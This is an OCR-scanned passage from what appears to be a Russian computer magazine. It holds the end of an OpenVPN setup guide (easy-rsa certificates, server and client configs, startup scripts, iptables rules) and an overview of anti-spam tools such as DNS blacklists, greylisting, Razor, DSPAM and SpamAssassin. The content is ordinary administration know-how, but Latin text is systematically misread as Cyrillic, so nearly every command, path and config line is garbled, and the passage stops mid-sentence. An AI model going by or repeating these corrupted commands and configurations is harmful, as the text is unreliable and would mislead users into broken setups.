АіпЬогПу) — ЪиіЫ-са (для подписи сертифика- 
тов сервера и клиентов) ; 



• ключ и сертификат сервера — ЬиіИ-кеу-зегѵег; 

• ключи для клиентов — простые (ЪшЫ-кеу) и 
защищенные паролем (ЪшШ-кеу-разз); 

• ключи РКСЗ (РиЫіс Кеу Сгуріо^гарЬу 
Зсапбагбз) — Ъиі1сІ-кеу-ркс5І2 (подойдут для 
хранения на сменных носителях вроде еТокеп) ; 

• создать ключ и сертификат (простой (ЬиіШ- 
гед) и защищенный паролем (Ъиіісі-гед-разз)), 
если СА не доступен в локальной системе, и 
подписать их (зі§п-гед) . 

• создать сертификат и ключ, используя СА, 

— Ъиіісі-іпііег; 

• создать ключ ЭііТіе Неітап — Ъиіісі-сііі (ис- 
пользуется при установленном соединении для 
шифрования трафика) ; 

• отозвать сертификат (геѵоке-сгі:); 

• отозвать с созданием списка отозванных сер- 
тификатов (СегіШсаіе Кеѵосайоп ІлЫ — СК1) 

— геѵоке-іиіі. 

ОрепѴРИ поддерживает двунаправленную ау- 
тентификацию, основанную на сертификатах, 
поэтому клиент должен идентифицировать 
сертификат сервера, проверяя, подписан ли он 
с помощью СА, и наоборот. Затем просматри- 
вается информация в заголовке сертификата. 
Это отлично видно в последнем тесте. Итак, 
вначале следует создать СА, а затем — серти- 
фикат и секретный ключ для сервера и всех 
клиентов. 

Создаем каталог /еіс/орепѵрѵ/кеуз и копи- 
руем в него все из еазу-гза. Чтобы меньше 
вбивать вручную, сначала стоит заглянуть в 
скрипт ѵагз и подправить значения пара- 
метров КЕУ_СОШТКУ, КЕУ_РКОѴШСЕ, 

КЕУ_С ІТУ = В 1 5 Н КЕ К, КЕУ_ОКС, КЕУ_ЕМАІЬ. 
Кроме того, параметр КЕУ_С(ШЕІС указыва- 
ет на файл орепззі.спі, находящийся в этом 
же каталоге. Он аналогичен одноименному 
файлу, используемому ОрепЗЗЬ; в него 
также стоит заглянуть (либо взять готовый 
вариант в /еііс/ззі) . Теперь можно сделать 
все необходимое: 

$ ссі еазу-гза 
$ зисіо . /ѵагз 
$ зисіо . /сіеап-аіі 
$ зисіо . /Ьиіісі-са 
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Если файлы ѵагз и орепззі.спі были подправ- 
лены, при создании сертификатов в боль- 
шинстве ответов можно оставлять значения, 
предлагаемые по умолчанию. Кроме одного. 
Поле Сопппоп Кате, в котором указывается 
имя хоста, обязательно к заполнению в любом 
случае, причем для сервера и для каждого 
клиента оно должно быть уникальным. По 
окончании работы в каталоге появятся два 
файла: са.кеу и са.сгб Для проверки сертифи- 
катов секретный ключ не нужен, он использу- 
ется только для подписи. Поэтому, учитывая 
его значимость, файл са.кеу лучше спрятать 
подальше от чужих глаз. При вызове следую- 
щих скриптов в качестве параметра необходи- 
мо указывать имя компьютера, для которого 
создаются ключ и сертификат. Сначала делаем 
все необходимое для работы сервера: 

$ зисіо . /Ьиііб-кеу-зегѵег зегѵег 

$ зисіо . /ЬиіІб-бЬ. 

А затем — для клиентов : 

$ зисіо . /Ьиіісі-кеу сііепбі 

$ зисіо . /Ьиіісі-кеу-разз с1іепб2 

Для второго клиента был создан ключ, защи- 
щенный паролем. На сервере оставляем файлы 
са.сгі, бЫ024.рет, зегѵег.згіи зегѵег.кеу. На 
компьютеры клиентов, помимо сертификата и 
ключа, переносим и са.сгі. 

Создание 

конфигурационных файлов — сервер 

ОрегіѴРИ работает по принципу клиент-сер- 
верной архитектуры в одном из двух режимов: 
«точка-точка» или «сервер-клиенты». Коли- 
чество клиентов во втором случае ограни- 
чивается только мощностью компьютера, 
играющего роль сервера. Причем на одном 
компьютере возможен одновременный за- 
пуск нескольких процессов орепѵрп, каждый 
из которых считывает собственный конфигу- 
рационный файл и работает в режиме сервера 
или клиента. Таким образом без проблем 
создается несколько виртуальных сетей. 

Есть несколько вариантов запуска сервера. 
Например, вызов орепѵрп из командной 
строки со всеми параметрами в придачу. 
Сервер может также запускаться через 
хіпеісі. Традиционным считается вариант с 
использованием конфигурационного файла в 
/еіс/орепѵрп и стартового скрипта в /еіс/іпіб 
б. Его и рассмотрим. 

Для создания конфигурационного файла сер- 
вера воспользуемся имеющимся шаблоном 



зегѵег.сопі, который находится в подката- 
логе 5атр1е-соп1і§-Ше. Все параметры в нем 
хорошо прокомментированы. Вариантов 
описания даже одной конфигурации сети 
может быть несколько, рассмотрим лишь 
один из них. Копируем файл в /еіс/орепѵрп и 
приступаем к редактированию: 

# ѴІ/ЕТС/0РЕМѴРМ/5ЕРѴЕР.С0МР 

# Необязательный параметр, ука- 
зывающий, на каком интерфейсе 
слушать, без него сервер будет 
принимать соединения на всех ин- 
терфейсах 

# Іосаі 195.95.95.95 

# Если используется несколько 
серверов , каждый должен работать 
на своем порту 

# рогб 1194 

# Тип виртуального устройства 
(бші, бар, гшіі) , в некоторых 
случаях необходимо указывать и 
его номер 

сіеѵ бип 

# По умолчанию используется про- 
токол ГОР, возможные варианты — 
бср, ибр, бср-зегѵег, бср-сііепб 

# ргобо бср-зегѵег 

# Включаем сжатие 
сошр-ізо 

# Отправка істр-пакетов , чтобы 
межсетевые экраны не разорвали 
соединения при их неактивности 
ріпд 15 

# Для біаі-ир, ЫАТ, РРР понадо- 
бятся следующие параметры: 

# ріпд-гезбагб 45 

# ріпд-бішег-геш 

# регзізб-бип 

# регзізб-кеу 

# Вывод отладочных сообщений, 
максимальное значение «9» стоит 
устанавливать только при отладке 
ѵегЪ 3 

# Назначаем виртуальному ин- 
терфейсу следующие ІР-адреса: 
своему — 10.1.0.1, удаленному 

— 10.1.0.2; используется при со- 
единении «точка -точка» 
ібсопбід 10.1.0.1 10.1.0.2 

# При установленном «тобе зегѵег» 
задается пул клиентских адресов 

# шобе зегѵег 

# зегѵег 10.1.0.0 255.255.255.0 

# Скрипт, содержащий сведения о 
новом маршруте 

ир ./ зегѵег. ир 



# Удаляем маршрут при остановке 
боѵлі . / зегѵег . боѵлі 

# Добавляем адреса сетей и ре- 
сурсов, которые будут доступны 
клиентам 

ризіі "гоибе 192.168.1.0 
255.255.255.0" 

# Использование ЗЗЬ/ТЬЗ (только 
для сервера) 

біз-зегѵег 

# Файлы ключей 

са /ебс/ орепѵрп/ кеуз/са . сгб 
сегб /ебс/орепѵрп/кеуз/зегѵег .сгб 
кеу /ебс/орепѵрп/кеуз/зегѵег . кеу 

# Параметры Біббіе-Неіішап при 
использовании біз-зегѵег 

6Ь /ебс/орепурп/кеуз/бН1024 .реш 

# Пользователь и группа, от имени 
которых будет работать программа 
изег орепѵрп 

дгоир орепѵрп 

Файл зегѵег.ир содержит информацию о новом 
маршруте, в простейшем случае запись такая: 

гоибе абб -пеб 10.0.1.0 пебшазк 
255.255.255.0 дет 192 . 168 . 1 . 1 

Здесь 192.168.1.1 — адрес внутреннего интер- 
фейса сервера ОрепѴРИ. И зегѵег.сіоѵт: 

гоибе беі -пеб 10.0.1.0/24 

Когда конфигурационный файл создан, можно 
проверить работу сервера. Первый раз это луч- 
ше сделать из консоли, куда будут выводиться 
все сообщения: 

$ зибо орепѵрп --сопбід /ебс/ 
орепѵрп/ зегѵег . сопб 

Теперь подсоединяемся с помощью іеіпеі: 

$ беіпеб Іосаібюзб 1194 

При получении ответа сервера можно про- 
должать. Если ОрепѴРИ устанавливался из 
исходных текстов, необходимо обеспечить его 
автоматический запуск при загрузке системы 
и остановку при выключении. Разработчики 
заранее подготовили несколько скриптов. В 
подкаталоге §етоо находится готовый файл 
орепѵрп.іпіі: для одноименного дистрибу- 
тива, а в затріе-зсгіріз — файл для запуска и 
остановки ОрепѴРИ в КебНаі/Еебога и других 
сйксопІі^-Ьазеб дистрибутивах. Хотя после 
небольшой доработки их можно использовать 
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>Сгенерированный статический ключ 

и в любом другом дистрибутиве. В общем случае подойдут простые 
скрипты — орепѵрп-зііагтр.зіі и орепѵрп-БІііПсІоѵт.БІі. Хотя заглянуть 
внутрь первого также стоит: 

# VI 0РЕМѴРМ-5ТАРТІІР.5Н 

# ! /Ьіп/зЬ 

# Конфигурационный каталог орепѵрп 
бі г = / еб с / орепѵрп 

# В этом файле есть готовые правила для ірбаЫез на 
все случаи жизни; если ты планируешь его использо- 
вать, то самостоятельную загрузку ірбаЫез следует 
отключить 

$біг/бігеѵ\/а 11 . зЬ 

# Подгружаем необходимый модуль 
тобргоЪе Пип 

# Включаем ІР богѵ\/агбіпд 

есбю 1 > /ргос/зуз/пеб/ірѵ4/ір_богѵ\/агб 

# Оставляем одну запись 

орепѵрп — сб $біг --баетоп --сопбід зегѵег.сопб 

# орепѵрп — сб $біг --баетоп --сопбід ѵрп 2 .сопб 

# орепѵрп --сб $біг --баетоп --сопбід ѵрп 2 .сопб 

Теперь копируем сценарий в /еіс/іп ібсі, делаем его исполняемым и создаем 
необходимые символические ссылки на уровнях запуска, помня о том, что 
ОрепѴРИ желательно загружать после того, как будет поднята сеть: 

$ сЬтоб +х орепѵрп- збагбир . зЬ. 

$ зибо ср орепѵрп- з баг Вир . зЪ. /ебс/іпіб.б 
$ зибо 1 з — п /ебс/іпіб . б/орепурп-збагбир . зЬ /ебс/ 
гсЗ . б/899орепѵрп-збагбир 

$ зибо 1 з — п /ебс/іпіб . б/орепѵрп-збагбир . зЬ /ебс/ 
гс5 . б/399орепурп-збагбир 
$ сЬтоб +х орепѵрп- збгиббоѵт . зЪ. 

$ зибо ср орепѵрп- збгиббоѵт . зП /ебс/іпіб.б 
$ зибо 1з — п /ебс/іпіб . б/ орепѵрп- збшббоѵт . зЪ. /ебс/ 
гсб . б/К80орепѵрп-зЬиббоѵт 

Настройки ірІаЫез 

Конечно, правила для ірііаЫез зависят от конкретной конфигурации, но в 
общем случае они должны выглядеть так: 

# VI 5ЕВѴЕВ.ІІР 

/зЬіп/ірбаЫез -I ШРБТ -р ибр --брогб 1194 -3 ЬодАссерб 
/зЬіп/ірбаЫез -I ОБТРБТ -р ибр --зрогб 1194 -3 
ЬодАссерб 

/зЬіп/ірбаЫез -I РОК^АКБ -з 10.0.1.0/24 -б 
192.168.1.0/24 -3 ЬодАссерб 
/зЬіп/ірбаЫез -I РОКШАКБ -б 10.0.1.0/24 -з 
192.168.1.0/24 -3 ЬодАссерб 



ФРОНТЕНДЫДЛЯІІЫиХКОРЕМѴРЫ 

Все настройки иуправление ОрепѴРЫ в Ыпихсовсем необязательно 
выполнять путем прямого редактирования конфигурационных файлов. 
Доступны графические интерфейсы, позволяющие сделать это легко 
и просто. Самым элементарным является коѵрп [ ѵѵѵѵѵѵ.епІідЫег.сІе ] : с 
его помощью можно запускать и останавливать демон, не вызывая 
консоль, при запросе вводить имя и пароль. 

Чуть больше возможностей у КѴрпс [ Ьоте.дпа.огд/кѵрпс ): создание 
ключей, импорт и экспорт конфигурационных файлов и сертификатов, 
работа с несколькими профилями. Он умеет работать и с некоторыми 
другими ѴРЫ-клиентами: Сізсо ѴРЫ (ѵрпс), ІРЗес (РгееЗ/ѴѴАЫ (ОрепЗ/ 
ѴѴАЫ), гасооп), РРТР Имеетлокализованный интерфейс. 
ОрепѴРЫ-Абтіп [ орепѵрп-абтіп.зкпеі: ]. написанный на Мопо, поз- 
воляет создавать сертификаты и управлять ими с помощью понятных 
мастеров, работать с несколькими профилями. 

Есть версии нетолько для*піх, но и для ѴѴІпсіоѵѵб; в планах вариант для 
[Чокіа 770. Также существует ОрепѴРМ Сопігоі [ орепѵрп-сопігоІ.зТпеІ: ) 
— мультиплатформенный фронтенд, написанный на Регі и Тк. С его по- 
мощью можно просматривать и управлять подключениями к серверу. 
Есть и модуль кѴѴеЬтіп [ ѵѵѵѵѵѵ.орепібіі/іпбех.рИр/орепіі еп/зойѵѵаге 
ІІЬего/орепѵрпасІтіп ). позволяющий вудобном графическом окру- 
жении редактировать ѵагз, генерировать все необходимые ключи и 
сертификаты, создавать серверы и отслеживать активные соединения. 



ЙѴІБЕВѴЕК.ООті 

/зЬіп/ірбаЫез -Б ШРбГТ -р ибр --брогб 1194 -3 ЬодАссерб 
/зЬіп/ірбаЫез -Б ОБТРБТ -р ибр --зрогб 1194 -3 
ЬодАссерб 

/зЬіп/ірбаЫез -Б РОКШАКБ -з 10.0.1.0/24 -б 
192.168.1.0/24 -3 ЬодАссерб 
/зЬіп/ірбаЫез -Б РОШАКБ -б 10.0.1 .0/24 -з 
192.168.1.0/24 -3 ЬодАссерб 

Некоторые варианты настройки іріаЫез можно подсмотреть в файле 
ПгеѵѵаІІ.БІі. 

Создание конфигурационных файлов — клиент 

Для клиентского компьютера также имеется шаблон — сІіепбсоіЫ. 
Конфигурационные файлы клиентов, подключающихся к одному сер- 
веру, будут отличаться лишь названиями файлов ключей и некоторыми 
сетевыми настройками. 

#ѴІСІ_ІЕМТ.СОМР 

беѵ бші 

# Для клиента обязательно указываем ІР и порт ОрепѴРЫ 
гешобе 195.95.95.95 1194 

ргобо ибр 
сошр-ізо 
ріпд 15 
ѵегЪ 3 

# Обрати внимание, что по сравнению с сервером ІР-ад- 
реса проставлены в обратном порядке 

ібсопбід 10 . 1 . 0.2 10 . 1 . 0.1 

ир ./сііепб.ир 

боѵ\?п . / с 1 і епб . боѵ^п 

са /ебс/орепѵрп/кеуз/са . сгб 

сегб /ебс/орепѵрп/кеуз/сііепбі . сгб 

кеу /ебс/орепѵрп/кеуз/сііепбі . кеу 

изег орепѵрп 

дгоир орепѵрп 

Клиент и сервер готовы. Можно запускать и пробовать соединение. 
Команда йсопй§ должна показать наличие ШпО на обоих компьютерах. 
По адресу 10.1.0.2 должен проходить ріп§. При этом о шифровании будет 
свидетельствовать то, что захваченный с помощью Щрбшпр пакет на 
интерфейсах ебіО и ШпО отличается. Успехов. НЕ 
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» ХАКЕР. РКО 




Ужас, летящий 



на крыльях 5МТР 



ОБЗОР ОСНОВНЫХ МЕТОДОВ БОРЬБЫ СО СПАМОМ 

Думаю, ты в курсе, что такое спам. Еще полбеды, если ты просто пользователь. Трафик сейчас не столь до- 
рог (а при желании львиную долю спама можно удалять прямо на сервере) , да и трата нескольких минут на 
вычистку мусора не так уж и критична (ТЬипсІегЪігсІ через недельку обучения будет исправно сортировать 
основную его массу сам) . Однако если твоя задача — обеспечивать работу почтового сервера, обслуживаю- 
щего сотни, а то и тысячи пользователей, тогда эта статья для тебя. 



Что беречь — трафик или нервы? 

Спам вреден по двум основным причинам: он 
увеличивает входящий трафик и отнимает вре- 
мя. С учетом этого средства борьбы со спамом, 
коих придумано уйма, можно разделить на две 
категории: ориентированные на снижение 
трафика и ставящие своей первоочередной 
задачей снижение нагрузки на конечного 
получателя. И поэтому, выбирая тот или иной 
инструмент, прежде всего спроси себя: «А чего 
я, собственно, хочу добиться: чтобы у бухгалте- 
ра в почтовом ящике не было мусора или чтобы 
фирма платила за интернет в два раза меньше, 
чем сейчас?» 

Начнем, пожалуй, с борцов за чистоту 
интернет-канала. 

Чужие здесь не ходят 

Одна из наиболее простых и до сих пор 
популярных идей — непосредственный 
запрет на прием почты с ІР-адресов, заме- 
ченных в рассылке спама. На заре интернета 
эта операция выполнялась вручную. Админ, 
обнаружив у себя нежелательную рассылку, 
пытался убедить владельца соответствующей 



сети прекратить это безобразие (админист- 
раторы почтовых серверов для приема жалоб 
даже специальные ящики заводили — аЪизе) . 
Если это не помогало, то ІР-адрес отправителя 
помечался в файле ассезз почтового сервера 
как КЕ1ЕСТ. 

В наши дни ручная борьба совершенно беспо- 
лезна. Но ассезз-файл тоже помогает только 
в редких случаях. Когда ты точно знаешь все 
серверы, с которых должна приходить нужная 
почта, вся остальная корреспонденция отбра- 
сывается без промедления. 

Поэтому дальнейшим развитием этой идеи 
стали черные списки — когда неблагонадеж- 
ные ІР-адреса целенаправленно собираются 
специальными компаниями или сообществами 
пользователей и предоставляются остальным. 
Поскольку такие списки довольно динамичны 
(в них постоянно кого-то добавляют, а кого-то 
исключают), то наиболее простым способом их 
распространения явилась система ЭИЗ. 

Черныедыры 

Суть блокировки по черным спискам на основе 
НИ 5 довольно проста: на некоем сервере 



(например, зратсор.пеН поднимается НИ5- 
сервер, который хранит у себя не традици- 
онные зоны, а информацию по спамерским 
ІР-адресам. Запросив у такого сервера поиск 
по специальному адресу, включающему ІР 
отправителя, и получив положительный ответ, 
можно сделать вывод, что адрес засвечен как 
спамерский. 

Многие почтовые серверы умеют работать 
с такими черными списками. Например, в 
Зепсітаіі соответствующие настройки могут 
выглядеть следующим образом: 

ЕЕАТТШЕ (Ыаск1ізС_гесіріепСз ) сіпі 
ЕЕАТТШЕ ( ' сіпзЫ * , 1 геіауз . огсІЬ . 
огд ' ) сіпі 

ЕЕАТТШЕ ( ' сіпзЫ ' , ' сіиі . ги ' ) сіпі 
ЕЕАТТШЕ ( ' сіпзЫ ' , 1 Ы . зрашсор . 
пек ' ) сіпі 

Одним из недостатков НИЗВЬ является их 
неразборчивость: убивать, так все. Однако слу- 
чаются ситуации, когда через сервер крупного 
провайдера передаются и официальная почта 
крупного банка, и рекламные рассылки от 
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» ХДКЕР.РКО 






> Начальство любит картинки... В РЗРАМ в них нет недостатка! 



>ТвойТЬипбегЬігс1 кое-что отсортирует и сам... 
Когда ты за это уже заплатишь 



какого-нибудь юнца, подключенного по АЭ5Б. 
Занести адрес такого сервера в черный список 
— значит лишить серьезных пользователей 
услуги электронной почты, а если не заносить, 
тысячи пользователей будут страдать от спама. 
Второй недостаток заключается в том, что в 
условиях широкого использования «одноразо- 
вых» зомби-сетей такие списки становятся не 
слишком полезны. Поэтому эволюция пошла 
дальше и стали появляться другие методы. 

Серые от злости 

Интересно, а как спамеры будут реагировать на 
ошибки доставки? Как показывает практика, 
из них мало кто утруждает себя следованием 
стандартам, получив временную ошибку 4хх. А 
вот нормальные серверы честно перемещают 
письмо в очередь и повторяют попытку через 
несколько минут. На этом и основана идея 
использования серых списков — §геуіізі:іп§. 
Одна из простейших реализаций для Зепсітаіі 
— тікег-§геу1ізк Устанавливается стандартно 
из портов, в зепсітаіі.тс добавляется единс- 
твенная строка: 

ШРІІТ_МАІЬ_ 

ЕІЬТЕК. ( ' тіікегдгеуіізк ' , 

' 3=1оса1 : /ѵаг/тіікег-дгеуіізк/ 

тіікег-дгеуіізк . зоск , Р=, 

Т=3 : 4т; К: 4т ' ) сіпі 

Тонкую настройку (например, выставить 
тайм-ауты, занести некоторые серверы в белый 
список и т.д.) можно выполнить в /изг/іосаі/ 
еіс/таі1/§геу1І5і: . со пГ. 

Более функциональное средство реализации 
грейлистинга (работает в ОрепВЗЭ и ЕгееВЗЭ) 
— зратсі. Этот фильтр полагается в своей 
работе на файрвол рі 7 . Его принцип действия 
заключается в следующем: рі 7 заворачивает 



соединения, адресованные на 25-й порт, на 
другой, прослушиваемый демоном зратсі 
(обычно 8025-й) . Если адрес отправителя 
фигурирует в черном списке (на сей раз это 
статический файл, который нужно периодичес- 
ки обновлять), то для него будет выполняться 
стандартный 5МТР-диалог, но с задержкой в 
одну секунду после каждого символа, а, дойдя 
до этапа ЭАТА, спамер получит ошибку 550 
или 450 (зависит от ключей запуска демо- 
на) . Для неизвестных адресатов реализуется 
стандартная процедура грейлистинга, то есть 
отклонение с ошибкой 45 1 «Сервис временно 
недоступен». 

В ЕгееВЗЭ установка зратсі из дерева портов 
выполняется тривиально: 

# ссі /изг/рогкз/таіі/зратсі 

# таке іпзкаіі 

Настройка сводится к добавлению в правила р! 
трех строк: 

каЫе <зратс!-ѵ1Ьіке> регзізк 

по гсіг іпек ргоко Сер кгот <зратсі- 

ѵЛ ііке> ко апу рогк 25 

гсіг разз іпек ргоко кер кгот апу 

ко апу рогк 25 -> 100.100.100.100 

рогк 8025 

В таблицу < зратсІ-ѵИіПе > будут попадать 
адреса, подтвердившие свою привержен- 
ность протоколу (этим они заслужили право 
соединяться непосредственно с 25-м портом) . 
Остальные будут отданы на растерзание зратсі 
(здесь 100.100.100.100 — адрес, на котором 
работает демон, в идеале он должен быть 
127.0.0.1) . Кроме того, не забудь проверить, 
что в /еіс/гс.сопі 7 обеспечивается автозапуск 
демона и поддержка рі: 



р к_епаЫе= " УЕЗ " 
рк_к1адз= " " 
рк1од_епаЫе= " УЕЗ" 
ркзрат<5._епаЫе= " УЕЗ " 
ркзратсі_к1адз= " -д -С 25:4:864 -ѵ" 

Последней строкой задаем нужные параметры 
работы (грейлистинг, тайм-ауты и подробный 
вывод) . Замечу, что зратсі можно использовать 
и исключительно в режиме черных списков 
(без ключей и '-О') . 

Грейлистинг хорош своей правильностью — он 
не нарушает никаких стандартов, поэтому 
практически исключает ложные срабатыва- 
ния. И в то же время он довольно существенно 
экономит трафик, отсеивая немало спама еще 
на подступах к серверу. Правда, его эффектив- 
ность обратно пропорциональна действию, 
оказываемому на спамеров (как ни пара- 
доксально это звучит), поскольку подобная 
защита обходится достаточно легко, если в этом 
возникнет необходимость. 

Перезвони мне 

Еще один способ борьбы со спамом сво- 
дится к попытке выяснить легитимность 
отправителя, предваряющей принятие 
сообщения. Одна из реализаций — встреч- 
ная проверка отправителя, или «обратный 
звонок» (саІІЪаск) . Суть проста: входящее 
сообщение задерживается на этапе ЭАТА и 
осуществляется имитация отправки сообще- 
ния по адресу, указанному в строке БКОМ. 
Если удаленный сервер не выдаст ошибку 
после отправки ему строки КСРТ ТО с этим 
адресом, то адрес считается существующим 
и прием сообщения продолжается. Если же 
сервер сообщит, что такого пользователя не 
существует, принимаемое сообщение будет 
отвергнуто. 
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» ХАКЕР.РКО 




> На сайте зратіезіги 
(ныне являющимся 
вотчиной Лабора- 
тории Касперского) 
можно получить 
немало сведений 
о современных 
тенденциях развития 
спама, статистику за 
тот или иной период, 
информацию о новых 
приемах рассылки 
нежелательной 
почты и борьбы с ней, 
статьи аналитиков 
и т.д. Крометого, 
море информации 
о спаметы найдешь 
вянварском «Спеце». 




> ѵѵѵѵѵѵ.5ратсор.пе1: 

— один из самых 
популярных черных 

СПИСКОВ; 

Ьсрпеіігееіг/тіиег- 
дгеѵііві — страничка 
программы тіКег- 
дгеуІівС 

ѵѵѵѵѵѵ.дгеуіізііпд.огд 

— сайт, посвящен- 
ный грейлистингу; 
гагог.воигсеЬгде.пеі 

— СаЙТ РЭ20Г; 

уууууу.орепЬзб.огд/ 
зрагшб — стра н и ца , 
посвященная зратсі; 
зратаззаззіп. 
арасбе.огд — офи- 
циальная страница 
ЗратАззаззіп. 




> Проверить ІР на вхождение в ЭІ\І5ВІ_ можно и руками 



Идея хороша, но связана с некоторыми проблемами. 
Например, что будет, если на обоих серверах настроен 
саІІЪаск? Для обхода этой проблемы используют пустое 
поле РКОМ, но тут выплывает другая неприятность — не- 
которые обучают свои почтовики убивать такие письма 
без суда и следствия. А если один сервер защищается 
обратным звонком, а другой — грейлистингом? Да и до- 
полнительным 5МТР-сессиям не каждый сервер будет рад. 

Игры больших мальчиков 

Среди экономящих трафик следует также отметить такие 
системы, как ЗРР, майкрософтовский Зепбег-ГО и УаЬоо 
ПотаіпКеуз (ЭК) . Суть их сводится к тому, что в НИЗ -зоне 
домена легальные почтовые серверы помечаются особым 
образом (текстовым полем или размещением публичного 
ключа), так что получатель может проверить, предусматри- 
вает ли администратор домена отправку почты с конкрет- 
ного ІР-адреса. 

Однако организационные сложности пока не позволяют 
этим системам распространиться достаточно широко, 
поэтому полагаться на них не стоит. В тікег-§геу1І5і: есть 
опция позрі — если она не активирована, то отправители, 
прошедшие проверку по ЗРР, будут рассматриваться как 
занесенные в белый список. Смотри также зір-тікег. 

Бритвой по горлу 

Со средствами, отсекающими спам на подлете, все ясно. 

Они здорово экономят трафик, но рубят на корню всю 
почту, идущую с неблагонадежных адресов (исключением 
является разве что грейлистинг, оставляющий отправителю 
второй шанс) . Поэтому компаниям, для которых потеря 
почты критична, они подходят не всегда. К то му же если 
адрес спамера еще нигде не засветился, то и блокировать- 
ся он не будет (опять-таки кроме грейлистинга) . Так что 
переходим к другой группе инструментов, задача которых 
беречь нервы пользователей. 

Здесь одной из первых идей был сигнатурный анализ по 
принципу антивирусных пакетов: в базе накапливается 
информация о спамерских письмах; клиент, получив 
письмо, рассчитывает его сигнатуру и отсылает на сервер 
для сличения; в случае положительного ответа письмо 
отклоняется. Наиболее известной системой, работающей 
по такому принципу, является Кагог. 

После установки (она потянет за собой несколько Регі-мо- 
дулей) анализатор можно сразу использовать. Беда только 
в том, что сам он с почтой ничего делать не умеет, полагаясь 
на таких помощников, как ргостаіі: 




> Для большей точности включи байес в Іосаі.ск Если 
действительно хочешь с ним возиться... 

# VI /ЕТС/РРОСМАІІ-.СОМР 

: 0 ѴУс 

I га20г-сЪ.еск 

: 0 Ѵ7аЕ 

/ѵаг/гагог/сагапСіпе 

Вместо помещения в карантин, можно ограничиться 
модификацией темы/заголовков, используй для этого 
Іогтаіі. Зарегистрировавшись в системе (командой гагог- 
абтіп -ге§І5і:ег), ты станешь ее участником и сможешь 
отсылать в базу свои образцы спама или указывать на 
ложные срабатывания. 

Очевидно, что для расчета сигнатуры письмо нужно при- 
нять полностью (или, по крайней мере, его значительную 
часть) . Кроме того, расчеты требуют вычислительных 
затрат. В условиях графического и вариативного спама 
сигнатурные анализаторы, даже несмотря на использова- 
ние нечетких сигнатур, становятся мало полезны. А при 
высоких скоростях рассылки их эффективность падает 
еще больше. 

Статистика знает все 

Сколько времени у тебя уходит на то, чтобы понять, спам 
перед тобой или письмо от приятеля? Думаю, меньше 
секунды, причем зачастую достаточно взгляда на заголовок. 
Значит, спам отличается от обычной почты (удивительное 
открытие, не так ли?) . И что мешает искать эти отличия 
автоматически? В принципе ничего, и фильтры на базе 
байесового классификатора пытаются это доказать. 

В их основе лежит классификация писем путем анализа их 
лексического состава с использованием теоремы Байеса. 
Упрощенно это сводится к такому предположению: если 
ранее 989 писем из 1000 со словом «виагра» были спа- 
мом, то следующее письмо с этим словом будет спамом с 
вероятностью 98,9%. Эффективность повышается за счет 
использования нескольких слов, их цепочек и т.д. Понятно, 
что для работы фильтр должен знать, какие слова ранее 
встречались в спаме, а какие — в нормальной почте, то есть 
ему необходимо обучение. 

Инструментов, реализующих идею лексического анализа, 
немало. Одним из наиболее интересных является ЭЗРАМ. 
Он работает между МТА и ящиками пользователей, 
подменяя собой агента локальной доставки (БЭА) . Есть 
возможность включить его между ящиком и пользовате- 
лем (в связке с РОРЗ -прокси), что также дает некоторые 
преимущества. Установка из портов сложности не вызы- 
вает (главное — осмысленно отмечать нужные опции) ; 
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конфигурирование сводится к редактирова- 
нию в /изг/іосаі/ет/сізрат.сопіопций под- 
ключения СУБД (саму базу тоже нужно подго- 
товить, в документации этот момент освещен 
достаточно подробно), выбору реального ІЮА 
и (при желании) настройке используемых 
алгоритмов анализа. Возможно, придется 
повозиться с настройкой ССІ-модуля, который 
очень требователен к правам доступа (я для 
упрощения жизни обычно использую вирту- 
альный хост в АрасЬе с включенным зиехес) . 

В конце необходимо обеспечить автозапуск 
демона при старте системы и добавить в 
зепсітаіі. тс такие строки: 

сіеіііпе ( ' ЬОСАЬ_МАІЬЕК_РАТН ' , 

* /изг/1оса1/Ьіп/с1зрат ' ) сіпі 
сіеіііпе ( ' ЬОСАЬ_МАІЬЕК_АКОЗ ' , 

1 сізрат " --сіе1іѵег=іппосепР , зрат" 
--изег $и -сі %и 1 ) сіпі 

Преимуществом ЭЗРАМ является удобный ССІ- 
модуль, позволяющий выполнять значительную 
часть административных работ через веб-ин- 
терфейс и, что самое главное, обеспечиваю- 
щий подобным интерфейсом пользователей, 
которые смогут самостоятельно обучать свою 
часть фильтра, работать со своим карантином 
и т.д. Но, помимо того что почта будет прини- 
маться полностью, потребуется уйма места для 
хранения баз, вычислительные ресурсы процес- 
сора. А самое неприятное — это необходимость 
постоянно следить за актуальностью данных и 
активно участвовать в обучении фильтра. Вряд 
ли бухгалтер захочет ежедневно проверять 
состояние своего карантина, так что эта работа, 
скорее всего, ляжет на плечи сисадмина. 



Убийца спама 

Наиболее известный инструмент для защиты 
от спама — ЗратАззаззіп. Он пытается объеди- 
нить под одной крышей большинство ныне 
существующих методов: от черных списков и 
ЗРР до сигнатур и байесового анализа. Кроме 
того, каждое сообщение прогоняется им по 
сотням «правил» — регулярных выражений, 
призванных выявить характерные признаки 
спама (например, большое число цифр в ад- 
ресе отправителя, нехарактерная кодировка 
и язык и т.д.) . Собственно говоря, проверка 
другими методами тоже оформляется в виде 
правил. В случае если письмо соответствует 
правилу, к его «счету» добавляется опреде- 
ленный балл. При превышении некоторого 
порога, письмо помечается как спам (их 
удалением ЗратАззаззіп, вопреки названию, 
не занимается — это забота других инстру- 
ментов: ргостаіі, почтового клиента и т.д.) . 
Установить его можно из портов или как обыч- 
ный Регі-модуль — через СРАИ. К Зепсітаіі он 
подключается через тікег (который инс- 
таллируется отдельно; я обычно использую 
зратазз-тіКег из коллекции портов) : 

шрііт_маіь_ 

ЕІЬТЕК. ( ' зрашаззаззіп ' , 

' 3=1оса1 : /ѵаг/гип/зрашазз- 

тііісег . зоск, Е=, Т=8 : 4т; К : 4т ' ) сіпі 

После установки следует сверить список правил 
(в /изг/іосаі/зііаге/зратаззаззіп) со своими пред- 
почтениями, выставить в /изг/іосаі/еіс/таіі/ 
зратаззаззіп/іосаі.сі осмысленное значение 
«порога срабатывания», подходящие баллы для 
тех или иных правил, включить дополнительные 



возможности, типа байесового анализа и АѴѴБ 
(автоматического белого списка) . Кроме того, 
если включен байесовый анализ, нужно про- 
вести обучение фильтра, скормив ему образцы 
«хороших» и «плохих» писем: 

# за-1еагп --Кат доосітаііз 

# за-1еагп --зрат Ьасітаііз 

Если функцию разбирательства с отмечен- 
ной почтой не планируется взваливать на 
пользователей, то придется позаботиться об 
этом самому, либо используя ргостаіі, либо 
с помощью иных дополнительных средств. 

В частности, в качестве универсального 
решения можно рассмотреть использование 
Атаѵізсі-пелл/, который, помимо подключения 
